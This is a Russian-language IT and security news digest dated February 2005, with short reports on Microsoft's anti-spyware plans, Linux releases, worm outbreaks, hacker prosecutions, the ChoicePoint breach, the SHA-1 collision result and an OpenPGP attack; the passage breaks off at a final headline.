Компания Microsoft собирается не просто стать игроком антивирусного рынка, а полностью ликвидировать потребность пользователей в антивирусном и антишпионском программном обеспечении. Такого мнения придерживается представитель аналитической компании Gartner Нил МакДоналд (Neil MacDonald), сообщает сайт VNUNET.com. МакДоналд убежден, что вместо заявленного срока «к концу 2006 года», Microsoft представит свои продукты на антивирусном рынке во второй половине текущего. «Этот ход станет серьезным вызовом как для продавцов антивирусов, которые получают доход непосредственно от пользователей (таких как Symantec), так и для продавцов, которые предлагают комплексные антивирусные решения для сетей (таких как McAfee и Computer Associates International)», — полагает аналитик. Кроме того, МакДоналд заявляет, что Microsoft намеренно отказывается совершенствовать систему безопасности в старых продуктах и таким образом вынуждает их пользователей приобретать новые: «Решение поставлять Internet Explorer 7.0 только для платформы XP заставляет думать о том, что Microsoft вынуждает перейти на эту платформу пользователей всех других операционных систем».
VNUNET

21/02/2005 13:22 "Корбина Телеком" ловит преступников
В течение последних нескольких месяцев универсальный оператор связи, компания "Корбина Телеком" регулярно сталкивалась со случаями кражи и порчи оборудования компании, установленного на некоторых узлах связи. Нарушения носили системный характер, при этом ущерб был причинен оборудованию, которое невозможно никому продать или как-либо использовать для личной наживы. Правоохранительные органы принимали меры по обеспечению безопасности жилых объектов, однако злоумышленники без труда попадали на крыши и в подвалы домов. В надежде поймать вредителей служба безопасности "Корбина Телеком" установила в узлах связи оборудование, позволяющее отслеживать и фиксировать факты правонарушений в режиме реального времени. В результате проведенной сотрудниками ОВД операции, правонарушитель был задержан на месте преступления. Уроженец Москвы Егор Михайлов попался в момент совершения им кражи дорогостоящего оборудования в доме по улице Бирюлевская. Ущерб от кражи, по оценке компании, составил более 250000 рублей и должен был привести к срыву связи у нескольких сотен абонентов. По факту преступления ОВД "Бирюлево Восточное" возбуждено уголовное дело по статье 158. По одной из отрабатываемых следствием версий, Михайлов является только исполнителем, личности организаторов преступной акции в настоящее время устанавливаются. "Корбина Телеком" намерена провести собственное разбирательство и выяснить имена правонарушителей и цели их противоправных действий.
Источник

21/02/2005 12:50 Win4Lin Pro запускает в Linux программы для Windows 2000 и XP
Компания Win4Lin представила выпуск Win4Lin Pro — программного обеспечения, позволяющего запускать приложения для Windows 2000 и Windows XP в среде открытой операционной системы Linux.
Win4Lin, Inc. стала самостоятельной компанией, выкупив все необходимое имущество у NeTraverse, Inc. — разработчиков первых версий эмулятора Win4Lin. Win4Lin Pro теперь именуется ключевым продуктом новой компании из линейки Win4Lin, в которую входит такое ПО, как Win4Lin 9X, Win4Lin Terminal Server и Win4Lin Home. «С Win4Lin Pro Linux на настольных ПК попросту стал реальностью. Ранее предприятиям и пользователям, нуждавшимся в запуске Windows-приложений на Linux, приходилось сталкиваться с проблемой дорогостоящего портирования, с тяжеловесными решениями в виде виртуальных машин или, в случае с Win4Lin, с ограничениями до Windows 98. Теперь в Win4Lin Pro представлена полная поддержка Windows 2000 и XP, так что все барьеры, препятствующие адаптации, устранены», — заявил Джим Кертин (Jim Curtin), президент и исполнительный директор Win4Lin, Inc. Win4Lin Pro поступит в продажу с 23 февраля. До 31 марта продукт будет продаваться по «начальной» стоимости в 99,95 долларов США за одну копию программы.
Nixp.Ru

21/02/2005 12:06 Компания Sun представила Java Desktop System 3
На этой неделе компания Sun Microsystems на конференции LinuxWorld представила Java Desktop System 3. На данный момент Sun не опубликовала полный список функциональных возможностей своей версии Linux, однако объявлено, что расширенный набор поддерживаемого оборудования и производительность — ключевые особенности новинки. Система JDS 3 построена на ядре Linux 2.6 с улучшенной базой поддерживаемого оборудования и последними open-source новинками для взаимодействия с другими desktop-системами и Microsoft Office. Герб Хинстрофф (Herb Hinstorff), руководитель подразделения разработки клиентского ПО в Sun Microsystems, заметил, что существенно расширить количество драйверов и поддерживаемого оборудования, особенно лаптопов и беспроводных устройств, помогло ядро 2.6. На новинку уже нашлись и крупные покупатели. В дистрибутиве выразили заинтересованность правительственные ведомства Великобритании и КНР.
Источник

21/02/2005 11:44 Европейский законопроект о патентах ожидает окончательного решения
Старшие члены Европейского парламента ратифицировали запрос о возврате на доработку директивы о патентах на программное обеспечение, однако участники кампании с обеих сторон разошлись во мнениях по поводу его дальнейшей судьбы. В начале месяца юридический комитет Европарламента потребовал заново переписать директиву о патентоспособности изобретений, реализуемых на базе компьютера. В ее существующем виде директива легализовала бы патентование ПО. Сторонники этого шага утверждают, что это защитит инвестиции европейских компаний в исследования и разработки, а противники — что это душит инновации. По словам представителей парламента, запрос на переработку был утвержден в четверг Конференцией президентов — то есть президентом парламента и председателями политических групп — без всяких дебатов и теперь может быть передан в Европейскую комиссию, которая будет принимать окончательное решение. Сначала предполагалось, что Комиссия выполнит запрос парламента, но в последнее время появились признаки, указывающие на то, что она может и проигнорировать его, выразив недовольство отказом Совета Европы ратифицировать директиву. Хартмут Пилч, президент Движения за свободную информационную инфраструктуру, затрудняется прогнозировать, как будут развиваться события дальше. «Не факт, что Комиссия удовлетворит запрос парламента и воспользуется случаем, чтобы подготовить качественный текст».
Подробнее

21/02/2005 10:35 IBM вкладывает сто миллионов в трехлетнюю пропаганду Linux
Компания IBM намеревается вложить 100 миллионов долларов в пропаганду решений на базе операционной системы Linux, сообщает BBC News. Эти деньги будут вложены в трехлетнюю программу, в рамках которой будут финансироваться различного рода инициативы, связанные с внедрением Linux-систем на все возможные типы оборудования - от КПК до серверов - для выполнения самых разных задач. Как заявили представители IBM, акция компании является ответом на возрастающий интерес потребителей в "свободном" программном обеспечении. В частности, планируется интегрировать компоненты на базе Linux в программный пакет IBM Workplace. Одним из пунктов программы является проведение разработок, призванных упростить общение пользователей с Linux, так как эта система традиционно считается сложной для освоения массовым пользователем. Это не первая подобная программа IBM - ранее, с 2001 по 2003 год, она уже проводила аналогичную трехлетнюю кампанию, вложив в нее 300 миллионов.
Lenta.Ru

17/02/2005 15:43 Microsoft будет проверять подлинность ОС Windows в Бразилии
Компания Microsoft продолжает борьбу с софтверными пиратами и начинает в Бразилии акцию Genuine Advantage Program, сообщает агентство Reuters. Бразильцы смогут получить доступ к некоторым обновлениям, таким как последняя версия Windows Media Player, только после проверки операционной системы на легальность. Тем пользователям, которые не пожалели денег на приобретение лицензионных копий Windows, компания предоставит скидки на собственные программы и на продукты своих партнеров. Загрузка прочих обновлений, определяемых компанией как "критические", будет доступна абсолютно всем пользователям, невзирая на подлинность ОС. По некоторым данным, 60% используемого бразильцами программного обеспечения являются пиратскими копиями. Но подтолкнул Microsoft к запуску программы в Бразилии еще и тот факт, что правительство запустило инициативу по продвижению программных продуктов с открытым кодом, таких как Linux. Программа начала действовать в сентябре 2004 года, но на первом этапе участие в программе было добровольным. Первыми странами, где пользователям предоставлялась возможность онлайновой проверки подлинности ОС, стали США, Канада, Китай и Чехия. Как заявляют представители Microsoft, участие в Genuine Advantage Program уже приняли более 7,6 миллиона человек, и у 60% из них легальность версий Windows подтверждена. Пока программа распространяется только на домашних пользователей и на представителей малого бизнеса, на компьютерах которых установлена ОС Windows XP и Windows 2000. C 7 февраля обязательная проверка была введена для трех локализованных вариантов Windows. Легальность копии ОС проверяется у пользователей, на чьих компьютерах установлены версии Windows на норвежском, чешском и китайском языках.
"Компьюлента"

17/02/2005 14:42 MyDoom опять атакует поисковики
Свежий вариант компьютерного червя MyDoom атакует такие поиковые порталы, как Google, Lycos, Yahoo и Altavista. Червь ищет адреса электронной почты на жестком диске зараженной машины и рассылает себя на найденные, используя для рассылки прямое подключение к SMTP-серверу получателя. Также для сбора адресов для рассылки червь использует механизм запросов к поисковым системам и получает адреса электронной почты из их ответов. В результате поисковые порталы оказываются перегруженными. Интересно, что особое внимание червь «уделяет» адресам электронной почты из того-же домена, что и инфицированный компьютер. Предыдущая версия вредоносного кода осуществила атаки на поисковые порталы в августе 2004 г., что привело к замедлению их работы или полному выходу из строя.
Источник

17/02/2005 13:50 Подросток осужден за атаки на сайт Microsoft
Окружной суд США вынес приговор подростку, который создал электронного червя, атаковавшего интернет-сайт компании Microsoft. Преступнику было всего 14 лет, когда он запустил червя RрсSDвот (также известного под названием W32/RpcSpybot-A) в августе 2003 года, после чего, зараженные компьютеры, работающие под управлением Windows, начали атаковать главный сайт компании Microsoft. Эта атака происходила одновременно с другой, производимой червем Blaster, который также «забивал» серверы Microsoft трафиком непрерывных обращений, перегружая их и вызывая отказ в обслуживании. Сначала следователи полагали, что между этими двумя происшествиями существует некая связь, однако впоследствии эти данные не подтвердились. Подросток был арестован в конце сентября 2003 года. На процессе подсудимый заявил: «Семнадцать месяцев назад я совершил самую ужасную ошибку в моей жизни. Я сделал это из любопытства и не думал, что мои действия повлекут за собой какой-либо ущерб. Мне очень жаль, что я доставил столько неприятностей людям, которых даже не знал». Судья Роберт Лазник (Robert Lasnik) принял во внимание раскаяние малолетнего преступника и приговорил его к трем годам испытательного срока. «Молодежь должна понять, что интернет — это не детская площадка, где все дозволено и любое поведение прощается», — заявил Грэм Клули (Graham Cluley), старший консультант Sophos. Обвинители окружного суда США сообщили, что федеральное законодательство запрещает им сообщать общественности подробности этого дела, включая данные о половой принадлежности подсудимого.
CNews

17/02/2005 13:38 Американские машины обвинены в шпионаже
Импортируемые в Германию американские автомобили могут быть оснащены устройствами, позволяющими тайно шпионить за их владельцами. Как заявил в интервью немецким СМИ уполномоченный по защите данных правительства германской земли Гессен Михаэль Ронелленфитш, его ведомство проводит в этом направлении тщательную проверку. В частности, как утверждают эксперты, на легковых автомобилях, предназначенных для германского рынка, американские концерны устанавливают приборы, фиксирующие, в частности, манеру езды каждого конкретного автомобилиста. Передача этих данных может осуществляться с помощью спутниковой навигационной системы. По словам Ронелленфитша, есть возможность в любой момент установить точное местонахождение автомобиля, скорость его движения и соблюдение безопасного расстояния на дороге. Однако, признал он, пока неизвестно, на что еще способна подобная техника. Тем временем, по оценке экспертов, определение профиля вождения автомобиля важно в первую очередь для снижения затрат при разработке новых моделей. Немалый интерес к этим данным могут иметь и ведущие рекламные агентства, работающие по заказу автомобильной промышленности. Для успешной продажи продукта необходимо изучить потенциального клиента и воздействовать на нужные струны. Есть и еще немаловажный аспект, который не следует сбрасывать со счетов. В США повседневностью стали иски попавших в аварию автомобилистов, которые утверждают, что причиной дорожно-транспортного происшествия стал технический дефект. Компенсации же оцениваются в многомиллионные суммы. Теперь с помощью шпионской техники автомобильный концерн без проблем может доказать, соблюдались ли пострадавшим правила движения. А если нет, то о компенсации и речи быть не может. В свою очередь, и страховые компании могут существенно урезать свои выплаты. Тем временем автопроизводители утверждают, что подобные спекуляции не имеют под собой никаких оснований. Как заявил в Штутгарте представитель германо-американского концерна "Даймлер-Крайслер", в их автомобилях никаких подобных устройств не устанавливается, да и с технической точки зрения это вряд ли возможно.
Подробности

17/02/2005 12:56 Операторы сотовой связи готовятся к эпидемиями вирусов для мобильных телефонов
Вирусы для мобильных телефонов пока появляются редко, но их число быстро растет одновременно с ростом числа портативных устройств, которые могут связываться друг с другом и интернетом. Такой вывод делают представители телекоммуникационной индустрии, сообщает Reuters. Производители антивирусных программ для мобильных телефонов отмечают значительную заинтересованность в своих продуктах со стороны операторов мобильной связи. Эта заинтересованность продиктована появлением по меньшей мере шести специальных «мобильных» вирусов в прошлом году. Шесть основных вирусов уже модифицированы приблизительно в 30 разновидностей, поскольку исходные коды для них были опубликованы в интернете, заявил глава «мобильного» подразделения антивирусной компании F-Secure Антти Вихавайнен (Antti Vihavainen). Крупнейший оператор мобильной связи в странах Северной Европы TeliaSonera заявил, что уже наблюдает за появлением новых «мобильных» вирусов. При этом в TeliaSonera отмечают, что в данный момент не считают эти вирусы серьезной проблемой. «Причин для паники нет, но ремень безопасности пристегнуть надо», — комментирует ситуацию представитель оператора Хакан Дальстром (Hakan Dahlstrom). F-Secure уже достигла соглашений об антивирусной защите сетей финского оператора Elisa и швейцарского оператора Swisscom. Защита от вирусов будет стоить абонентам этих сетей приблизительно 2 евро в месяц. «Прежде продажа антивирусных программ мобильных операторов была сродни продаже холодильников эскимосам. Сейчас мы получаем звонки крупнейших операторов, которые спрашивают нас, что делать», — говорит Вихавайнен.
Подробнее

17/02/2005 12:34 22-летний американец признался во взломе серверов оператора мобильной связи
22-летний житель американского штата Орегон Николас Якобсен (Nicolas Jacobsen) признал себя виновным в намеренном проникновении в защищенную компьютерную сеть и причинении ущерба по неосторожности. Объектом, к которому Якобсен получил доступ, стали серверы оператора мобильной связи T-Mobile, сообщает сайт Securityfocus.com. По словам прокурора, признание Якобсена — часть судебного соглашения. Сообщать детали этого соглашения представитель обвинения отказался. Обвинение против Якобсена, информация о котором впервые появилась в январе, с самого начала было окружено завесой секретности. По информации из источника, близкого к расследованию, Якобсен может являться тайным информатором властей. Полиция арестовала Якобсена в октябре прошлого года. Задержанному инкриминируется взлом базы данных T-Mobile и хищение паролей и номеров социального страхования абонентов компании. Кроме того, Якобсена обвиняют в чтении электронной переписки агентов Секретной службы США, работающих в сфере киберпреступлений. Согласно отчету Секретной службы, включенному в материалы дела, Якобсен попал в поле зрения агентов в марте прошлого года. В то время на одной из интернет-досок объявлений он выставил на продажу информацию об абонентах T-Mobile. В самой компании заявляют: 400 абонентов, к чьим данным подобрался Якобсен, получили предупреждения. При этом сотрудники мобильного оператора не исключают того, что им удастся выяснить имена других потерпевших. «Могу заверить, что по информации, которой мы владеем на сегодня, все абоненты предупреждены. Расследование продолжается», — сообщил пресс-секретарь компании Питер Доброу (Peter Dobrow).
Источник

17/02/2005 12:15 Уязвимости в ядрах Linux 2.6.x
Michael Kerrisk, Ogawa Hirofumi и David Coulson обнаружили несколько уязвимостей в ядре Linux версии 2.6, сообщает Secunia. Последствия уязвимости могут заключаться либо в доступе к важной системной информации локальным пользователем, либо DoS. Первая уязвимость связана с некорректными полномочиями при обращении к функции "shmctl()", что позволяет любому процессу разблокировать доступ к сегменту памяти с записью важной системной информации в swap-файл. Вторая уязвимость связана с некорректным переключением терминалов при использовании функции "setsid()", используемой при запуске новых сессий процесса. Третья уязвимость с некорректной установкой размера таблицы "nls_ascii.c" в 128 вместо положенных 256 (байт?), что может быть использовано для осуществления переполнения буфера и отказу функционирования ядра. Ну и, наконец, четвёртая уязимость связана с ошибкой при проектировании в модуле файрволла netfilter/iptables, которая может вызвать отказ в функционировании ядра, либо может быть использована для обхода правил файрволла. Уязвимости устранены в недавно вышедших версиях 2.6.11-rc1 и rc3, первые две пока ещё присутствуют в коде ядра.
Подробности

17/02/2005 11:42 Google дополнила поисковую панель инструментов
В среду Google предложила новую версию панели инструментов для веб-поиска, дополненную тремя новыми функциями. Программа, бета-версию которой можно загрузить с Toolbar.google.com, позволяет выполнять поиск из фиксированного поля на панели инструментов веб-браузера Internet Explorer и блокировать всплывающие рекламные окна. В версии 3 поисковой панели добавлены функции автоматической проверки орфографии в веб-формах; перевода английских слов на несколько языков, а также возможность дополнять некоторые словосочетания, набранные простым текстом, соответствующими веб-ссылками. Например, нажатием кнопки на панели инструментов почтовый адрес можно дополнить гиперссылкой на географическую карту. «Все эти функции способствуют сокращению числа операций копирования и вставки», — пояснила директор Google по потребительским веб-продуктам Марисса Мейер (Marissa Mayer).
Подробности

17/02/2005 11:08 Группа хакеров украла персональную информацию о 30 тысячах жителей Калифорнии
Компания ChoicePoint, занимающаяся учетом различных данных о гражданах США, обнародовала информацию о том, что минувшей осенью ее калифорнийское подразделение стало объектом хакерской атаки, в результате которой из базы данных была украдена персональная информация о более, чем 30 тысячах жителей этого штата, сообщает Associated Press. Разные отделения ChoicePoint хранят личные данные, необходимые для различных видов документооборота, почти обо всех гражданах США. В число таких данных входят имена, адреса, сведения о кредитной истории, номера социального страхования и другая информация, которая может распространяться только организациями (государственными и коммерческими), имеющими разрешение на работу с ней. При попадании подобной информации в руки злоумышленников она может быть использована для совершения различного рода махинаций от чужого имени. Как сообщили представители компании, группа злоумышленников, по всей вероятности, с помощью украденных ранее удостоверений организовали подставную фирму, которой успешно удалось заключить с ChoicePoint договор на обслуживание. В процессе работы, как выяснилось впоследствии, хакеры получили доступ к компьютерным базам данных ChoicePoint и украли оттуда всю информацию, которую обнаружили. Впоследствии фирма пропала вместе с ее сотрудниками. В настоящее время по этому делу проводятся следственные действия, и жителей штата предупредили о том, чтобы они внимательно следили за списаниями со своих банковских счетов. Недавно правоохранительные органы арестовали человека, который был уличен в шести случаях махинаций подобного рода, однако пока неизвестно, причастен ли он к данному делу. Некоторые представители властей сообщают, что в результате взлома базы ChoicePoint могла быть украдена информация не только о жителях Калифорнии, но и о жителях других штатов, однако официального подтверждения этой информации нет.
Lenta.Ru

16/02/2005 16:30 Symantec борется со шпионским кодом
В состав антивируса Symantec AntiVirus Corporate Edition 10.0, запланированного к выпуску на март, планируется включить механизм защиты от шпионских программ, способных скрытно передавать конфиденциальную информацию третьим лицам. Подобными свойствами будет обладать и предназначенное для настольных систем ПО Symantec Client Security 3.0, выполняющее функции антивирусной защиты, предотвращения внешних вторжений и межсетевого экранирования. Ожидается также, что устройства семейства Symantec Network Security 7100 Series смогут блокировать действие таких шпионских программ, как Gator и Hotbar и бороться с троянцами типа Gaobot, Spybot и Rxbot.
"Открытые системы"

16/02/2005 16:13 Red Hat Enterprise Linux 4.0 (RHEL4)
Linux-компания Red Hat сегодня представила свой новый флагманский дистрибутив Red Hat Enterprise Linux 4.0 (RHEL4). Новинка была показана на Linux-конференции LinuxWorld Conference and Expo. По прогнозам разработчиков, RHEL4 должен серьезно потеснить на рынке Novell и Sun Microsystems. RHEL4 — это первый коммерческий дистрибутив от компании Red Hat, построенный на ядре 2.6. Несмотря на то, что и в прежний дистрибутив были включены некоторые функции нового ядра, до сегодняшнего дня единственным коммерческим Linux-дистрибутивом на основе Linux 2.6 был SUSE Linux Enterprise Server 9 (SLES9) с улучшенной подсистемой работы с памятью и сетевыми интерфейсами, выпущенный 7 месяцев назад (в августе 2004 года). Пол Кормье (Paul Cormier), исполнительный директор отдела разработок в Red Hat: «Одна из главных новинок в дистрибутиве — это система Security Enhanced Linux или просто SELinux. Первоначально данная разработка была создана в недрах Национального Агентства по Безопасности США (National Security Agency, NSA). Данный комплекс позволяет руководить распределением оперативной памяти под каждый отдельный процесс, в результате сам сервер становится более надежным в работе за счет того, что одно зависшее приложение не “повесит” весь сервер, а во-вторых, сервер становится более защищенным от хакерских атак, за счет того, что каждое приложение работает в жестко заданных пределах памяти». По умолчанию опция SELinux уже включена для тех приложений, которые отвечают за сетевые сервисы, например, в web-сервере Apache. Новая версия RHEL4 включает в себя Logical Volume Manager (LVM) 2 — пакет, отвечающий за хранение данных, распределенных на нескольких жестких дисках. Также в комплекте идет ПО, позволяющее работать с серверами Microsoft Exchange, поддерживаются диски Serial ATA (SATA) и большая база драйверов для цифровых устройств.
RHEL 4 выпускается как для 32-битных, так и для 64-битных систем на базе Intel Xeon и AMD Opteron; Intel Itanium; и IBM Power. Для рабочих станций новая ОС также превосходно подходит, поддерживаются варианты для 1-, 2- и 4-процессорных рабочих станций. По заявлениям представителей Red Hat, все приложения, написанные для RHEL3, будут отлично работать и на новой версии ОС. Цена продукта сильно варьируется, однако осталась неизменной по сравнению с предыдущей версией. К примеру, один год подписки на RHEL 4 Enterprise на 2-процессорном сервере обойдется в 799 долларов США. Вариант RHEL 4 Advanced Server на 4-процессорном сервере стоит 2499 долларов США.
Nixp.Ru

16/02/2005 15:22 Свежая спамерская программа "подставляет" провайдера
Последняя версия программы Send-Safe, предназначенной для рассылок непрошеной электронной корреспонденции, имеет функционал, позволяющий обходить антиспамерские фильтры. Часто фильтры используют «черные» списки компьютеров, с которых рассылается спам, многие из которых являются «зомби». Получение почты с данных адресов блокируется. Свежая версия Send-Safe позволяет менять адрес компьютера, с которого рассылается спам на адрес провайдера интернет-услуг. Блокировка таких рассылок приведет к неполучению электронных писем от всех клиентов данного провайдера, что в ряде случаев будет слишком дорогой ценой за избавление от спама.
CNews

16/02/2005 15:08 Mozilla FireFox стал безопаснее
Группа разработчиков Mozilla решила отказаться от поддержки международных доменных имен в будущих версиях браузера FireFox в связи с недавними проблемами в безопасности. Теперь, чтобы задействовать поддержку IDN в браузере, придётся вручную менять значение network.enableIDN на true в настройках (about:config) программы, cообщает linux.org.ru.
Подробности

16/02/2005 14:46 Novell выбирает защиту open-source
Безопасность и open-source в Novell идут рука об руку. В понедельник компания сообщила, что она передаст двум проектам open-source интерфейсы прикладных программ для eDirectory, позволив разработчикам использовать сетевой каталог Novell в целях аутентификации при допуске к сети. Кроме того, Novell объявила о партнерстве с компанией Astaro, специализирующейся на Linux-безопасности, цель которого — создание решений защиты на базе операционной системы Novell SuSE Linux. Эти анонсы были сделаны в связи с проходящими на этой неделе в Сан-Франциско конференцией по безопасности RSA и конференцией LinuxWorld в Бостоне. Передаваемый код необходим для использования служб безопасности Novell eDirectory, основы комплекса программного обеспечения Novell для управления учетными записями пользователей. Распоряжаться этим кодом будут проекты open-source FreeRadius и Samba. Novell владеет портфелем прочно утвердившихся на рынке продуктов сетевой защиты, которые она продает под торговой маркой Nsure. В 2003 году Novell приобрела open-source компании SuSE Linux и Ximian, пытаясь сыграть на растущем интересе к ПО с открытым исходным кодом. Имея доступ к интерфейсам прикладных программ (API) для eDirectory, разработчики смогут создавать приложения, встраиваемые в систему аутентификации Novell, которая поддерживает стандарт Lightweight Directory Access Protocol (LDAP).
ZDNet

16/02/2005 14:25 Билл Гейтс объявил о скором выходе Microsoft Internet Explorer 7.0
Глава корпорации Microsoft Билл Гейтс (Bill Gates), выступая во вторник перед специалистами по компьютерной безопасности на конференции RSA Conference, открывшейся накануне в американском городе Сан-Франциско, объявил о предстоящем выходе новой версии одного из главных продуктов компании - браузера Microsoft Internet Explorer, сообщает Reuters. По словам Гейтса, бета-версия Internet Explorer 7.0 появится этим летом и будет распространена среди желающих ее протестировать. В ней, как ожидается, будут учтены и ликвидированы недостатки, присущие широко используемой нынешней, шестой, версии этого браузера, которая остается почти неизменной с 2001 года. Главным недостатком, по мнению экспертов, является чрезмерная уязвимость программы, "дыры" в которой широко используются злоумышленниками для получения несанкционированного доступа к компьютерам пользователей. Как известно, Internet Explorer (IE) является доминирующим браузером и используется для доступа в Интернет на большинстве компьютеров мира. Раньше рыночная доля IE доходила до 99 процентов, однако с появлением в ноябре минувшего года нового браузера Firefox 1.0, созданного распределенной группой "свободных" разработчиков Mozilla Foundation, IE был отброшен за порог в 90 процентов и продолжает терять популярность. Кроме того, о разработках собственных браузеров объявил ряд других интернет-компаний.
Lenta.Ru

16/02/2005 14:01 Китайцы нашли способ взлома созданного спецслужбами США шифра SHA-1
Исследователи-криптоаналитики из Китая нашли слабину в американском криптоалгоритме SHA-1. Этот алгоритм был разработан в Агентстве национальной безопасности США и принят Национальным институтом стандартов США в качестве инструмента для создания электронной подписи. Алгоритм генерирует последовательность из 160 бит на основе любого документа длиной до 2**64 бит. Принципы работы алгоритмов семейства SHA сходны с принципами более старых алгоритмов MD4 и MD5. Однако, как пишет в своем блоге Брюс Шнайер - известный специалист по компьютерной безопасности и криптографии - алгоритм может оказаться совсем не таким надежным, как предполагалось. Ссылаясь на результаты исследователей Шаньдонского университета (КНР), Шнайер отмечает, что добиться хэш-коллизии в алгоритме SHA-1 можно за 2**69 операций, тогда как методом простого перебора алгоритм вскрывается за 2**80 операций. Под хэш-коллизией (hash collision) в данном случае подразумевается генерирование хэш-функцией одного и того же значения при двух различных наборах исходных данных. Если получить коллизию достаточно легко, то алгоритм не может использоваться для электронной подписи, поскольку подпись может быть сгенерирована как на основе оригинального документа, так и на базе набора данных, вызывающего коллизию. Это уже не первый подобный случай с алгоритмами семейства SHA (аббревиатура расшифровывается как Secure Hash Algorithm). Первый алгоритм семейства - SHA-0 был представлен АНБ в 1993 году, но через два года был отозван из-за проблем с безопасностью. Подробностей об этих проблемах не сообщалось, но, по данным китайский исследователей, коллизии в случае SHA-0 можно добиться за 2**33 операций. Призванный исправить недочеты SHA-0 алгоритм SHA-1 был выпущен в 1995 году. Однако из-за сообщений о его возможной нестойкости, Национальный институт стандартов США планирует к 2010 году отказаться от SHA-1 в пользу набора алгоритмов SHA-2. Что касается результатов китайских исследователей, то они не означают, что SHA-1 - совершенно бесполезный алгоритм. Во-первых, 2**69 операций - это очень большой объем вычислений и на практике взлом осуществить все равно непросто. Во-вторых, авторы исследования Сяоюнь Ван, Йицунь Лиса Йинь и Хонбо Ю пока нигде не опубликовали деталей своего исследования, так что говорить о стопроцентной достоверности их результатов пока нельзя.
Блог Брюса Шнайера

16/02/2005 12:54 Microsoft готова раздавать программу AntiSpyware бесплатно
Глава компании Microsoft Билл Гейтс во вторник, выступая перед специалистами по компьютерной безопасности на конференции RSA Conference в Сан-Франциско, заявил, что возглавляемая им корпорация намерена распространять свои разработки в области борьбы со "шпионскими программами" (spyware) бесплатно всем желающим, сообщает Associated Press. Как известно, о намерении Microsoft выйти на рынок антивирусного ПО стало известно в конце минувшего года. Компания купила небольшую фирму Giant, специализирующуюся на "антишпионских" продуктах, а в январе представила бета-версию программы Microsoft AntiSpyware. Чтобы скачать эту программу с сайта Microsoft, необходимо пройти проверку подлинности используемой копии Windows. Ранее корпорация не объявляла, по какому принципу собирается распространять свой новый инструмент. Существовали предположения, что он будет платным и войдет в новое издание ОС Windows. На прошлой неделе специалисты обнаружили вредоносную программу, получившую название BankAsh-A, которая заражает компьютеры, похищает с них информацию о банковских реквизитах пользователя и стирает из системы Microsoft AntiSpyware, если такая установлена. Как ранее сообщалось, Microsoft накануне представила такдже программу Malicious Software Removal Tool, которая занимается поиском и удалением наиболее распространенных вирусов и "червей".
Подробности

14/02/2005 12:08 Китай закрыл еще 12,5 тысяч нелегальных интернет-кафе
Власти Китая через государственные СМИ отчитались о том, что за октябрь и декабрь минувшего года ими была пресечена деятельность 12575 нелегальных интернет-кафе. Как известно, Интернет в Китае контролируется государством и предоставлять услуги интернет-доступа могут только организации, одобренные контролирующими структурами. "Правительство КНР в прошлом году вплотную занималось созданием безопасной окружающей среды для молодых людей в Китае, и в этой связи были закрыты многие коммерческие заведения, работавшие нелегально. Таким образом, были закрыты 12575 нелегальных интернет-кафе, 2861 танцевальный клуб, 6200 залов игровых автоматов и 131481 закусочная", - говорится в опубликованном в понедельник отчете Министерства образования КНР, который приводит агентство "Интерфакс". Доступ к иностранным сайтам, которые пропагандируют точку зрения, отличную от государственной, блокируется, а люди, пытающиеся создать такие сайты в Китае, преследуются. Это относится, в частности, к сайтам, распространяющим порнографические материалы и предлагающим азартные игры. Нелегальные точки доступа в Интернет предоставляют пользователям возможность посещения запрещенных сайтов, и с ними ведется борьба. В прошлом году китайские власти в период проведения кампании с февраля по август 2004 года закрыли на территории страны 1600 интернет-кафе, деятельность которых не соответствовала требованием властей. Один из главных методов государства - стимулирование доносов, за которые платятся деньги.
Источник

13/02/2005 16:39 Белорусский МИД возмущен действиями болгарского хакера
Действия гражданина Болгарии, взломавшего сайт МИД Белоруссии, носят хулиганский характер. Такое мнение высказал представитель городского управления внутренних дел города Минска МВД Белоруссии. По его словам, гражданин Болгарии, находясь на территории своей страны, 1 ноября прошлого года осуществил несанкциониронный доступ на сайт министерства иностранных дел Белоруссии и внес изменения в размещенную там информацию МИД. В МВД Белоруссии сообщили, что в настоящее время уголовное дело, которое было возбуждено против гражданина Болгарии, передано правоохранительным органам этой страны и будет рассматриваться на территории Болгарии, передает «Утро.ru». «В МВД Белоруссии считают, что несанкционированный доступ на сайт МИД Белоруссии был продиктован именно хулиганскими мотивами», - сказал представитель МВД. Он отметил, что МВД Белоруссии не имеет практики ведения подобных дел и надеется, что в процессе расследования будет приобретен опыт ведения следствия по хакерским взломам с территории иностранных государств на территории Белоруссии.
Источник

13/02/2005 15:55 Soalris 10 скачали уже более 420000 раз
Джонатан Шварц (Jonathan Schwartz) из Sun Microsystems в своем блоге подвел первые предварительные итоги скачивания ОС Solaris 10, прокомментировав их «одним словом — “wow”», cообщает Nixp.Ru. Solaris 10 для платформы SPARC скачали 151039 раз, а для x64 и x86 — 269856, что в сумме составляет 420895 закачек. По данным цифрам, полагает Шварц, уже сейчас можно сделать вывод, что «проблем со спросом мы не встретим». Особое внимание Шварц уделил тому факту, что большее число скачиваний пришлось именно на долю x64 и x86, а не родную для Solaris платформу SPARC.
Подробности

13/02/2005 15:31 Сравнение скорости web-браузеров
Опубликованы результаты тестирования производительности Firefox (1.0), Konqeror (3.2), Opera (6.03, 7.54, 8.0) и Mozilla (1.0, 1.8), cообщает opennet.ru. Тесты: время запуска браузера, скорость рендеринга CSS и таблиц, загрузка страниц с большим числом картинок. Испытания проведены раздельно для платформ Linux, MacOS X и Windows, в заключении представлена оценка скорости работы таких браузеров как links и lynx. Лучшие результаты показал браузер Opera.
Результаты тестов

13/02/2005 14:48 Атака на OpenPGP
Mister и Zuccherato придумали exploit способности OpenPGP проверять зашифрованное сообщение на правильность. Обычным пользователям это ничем не грозит. Но, например, в том случае если вы настроили автоматическую предобработку своей почты -- так что если встречается зашифрованное для вас сообщение, то оно автоматически проверяется, и в случае ошибки отбрасывается обратно отправителю, то у вас проблемы, потому что атакующий способен получить часть plain text'а всего лишь после нескольких десятков тысяч проб. Несмотря на невысокую практичность этой атаки, gpg включит контрмеры против нее в 1.4.1
Подробности

13/02/2005 14:13 Легендарный хакер посетил Москву
